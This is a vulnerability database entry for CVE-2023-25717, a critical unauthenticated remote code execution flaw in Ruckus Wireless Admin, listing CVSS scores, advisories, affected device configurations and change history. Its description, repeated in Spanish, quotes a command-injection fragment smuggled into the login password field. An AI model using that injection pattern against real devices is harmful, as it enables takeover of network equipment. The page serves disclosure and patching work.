CVE-2023-25717

  1. Yack CVE
  2. Vulnerabilities (CVE)
  3. CVE-2023-25717

9.8 /10

CVSS v3 : CRITICAL

V3 Legend

Vector :

Exploitability : 3.9 / Impact : 5.9

Attack Vector NETWORK

Attack Complexity LOW

Privileges Required NONE

User Interaction NONE

Confidentiality Impact HIGH

Integrity Impact HIGH

Availability Impact HIGH

Scope UNCHANGED

R

uckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

References
Link Resource
https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ Exploit Third Party Advisory
https://support.ruckuswireless.com/security_bulletins/315 Patch Product Vendor Advisory
https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ Exploit Third Party Advisory
https://support.ruckuswireless.com/security_bulletins/315 Patch Product Vendor Advisory
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717 US Government Resource
Configurations

Configuration 1 (hide)

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:ruckuswireless:smartzone_ap:*:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:e510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:h320:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:h350:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:h510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:h550:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:m510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r310:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r320:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r350:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r550:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r610:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r650:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r710:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r720:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r730:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r750:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r760:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r850:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz-144:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz100:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz300:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310c:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310d:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310n:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310s:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t350c:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t350d:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t350se:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t610:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t710:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t710s:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t750:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t750se:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t811-cm:-:*:*:*:*:*:*:*

Configuration 2 (hide)

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:ruckuswireless:smartzone_ap:*:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:e510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:h320:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:h510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:m510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r310:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r320:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r500:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r510:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r550:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r600:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r610:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r650:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r710:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r720:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r730:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r750:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r850:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t300:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t301n:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t301s:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310c:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310d:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310n:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t310s:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t504:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t610:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t710:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t710s:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t750:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t750se:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t811-cm:-:*:*:*:*:*:*:*

Configuration 3 (hide)

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:ruckuswireless:smartzone_ap:*:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:h500:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r300:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r700:-:*:*:*:*:*:*:*

Configuration 4 (hide)

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:ruckuswireless:smartzone_ap:*:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:r560:-:*:*:*:*:*:*:*

Configuration 5 (hide)

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:commscope:ruckus_smartzone_firmware:*:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:sz-144:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz300:-:*:*:*:*:*:*:*

Configuration 6 (hide)

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:commscope:ruckus_smartzone_firmware:6.1.0.0.935:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:sz-144:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz100:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz300:-:*:*:*:*:*:*:*

Configuration 7 (hide)

AND
cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:m510-jp:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:p300:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:q410:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:q710:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:q910:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:t811-cm\(non-spf\):-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:zd1000:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:zd1100:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:zd1200:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:zd3000:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:zd5000:-:*:*:*:*:*:*:*

Configuration 8 (hide)

AND
OR cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
cpe:2.3:o:commscope:ruckus_smartzone_firmware:*:*:*:*:*:*:*:*
OR cpe:2.3:h:ruckuswireless:sz-144-federal:-:*:*:*:*:*:*:*
cpe:2.3:h:ruckuswireless:sz300-federal:-:*:*:*:*:*:*:*
History

03 Nov 2025, 18:14

Type Values Removed Values Added
References () https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717 - () https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717 - US Government Resource

22 Oct 2025, 00:18

Type Values Removed Values Added
References
  • () https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717 -

21 Oct 2025, 20:19

Type Values Removed Values Added
References
  • {'url': 'https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717', 'source': '134c704f-9b21-4f2e-91b3-4a467353bcc0'}

21 Oct 2025, 19:19

Type Values Removed Values Added
References
  • () https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-25717 -

22 Aug 2025, 21:09

Type Values Removed Values Added
CPE cpe:2.3:o:ruckuswireless:smartzone:6.1.0.0.935:*:*:*:*:*:*:*
cpe:2.3:o:ruckuswireless:smartzone:*:*:*:*:*:*:*:*		 cpe:2.3:o:commscope:ruckus_smartzone_firmware:*:*:*:*:*:*:*:*
cpe:2.3:o:commscope:ruckus_smartzone_firmware:6.1.0.0.935:*:*:*:*:*:*:*
First Time Commscope ruckus Smartzone Firmware
Commscope

21 Nov 2024, 07:49

Type Values Removed Values Added
Summary
  • (es) Ruckus Wireless Admin hasta la versión 10.4 permite la ejecución remota de código a través de una solicitud HTTP GET no autenticada, como lo demuestra /forms/doLogin?login_username=admin&password=password$(curl substring.
References () https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ - Exploit, Third Party Advisory () https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/ - Exploit, Third Party Advisory
References () https://support.ruckuswireless.com/security_bulletins/315 - Patch, Product, Vendor Advisory () https://support.ruckuswireless.com/security_bulletins/315 - Patch, Product, Vendor Advisory
Information

Published : 2023-02-13 20:15

Updated : 2025-11-03 18:14

NVD link : CVE-2023-25717

Mitre link : CVE-2023-25717

CVE.ORG link : CVE-2023-25717

JSON object : View

Products Affected

ruckuswireless

commscope

CWE
CWE-94

Improper Control of Generation of Code ('Code Injection')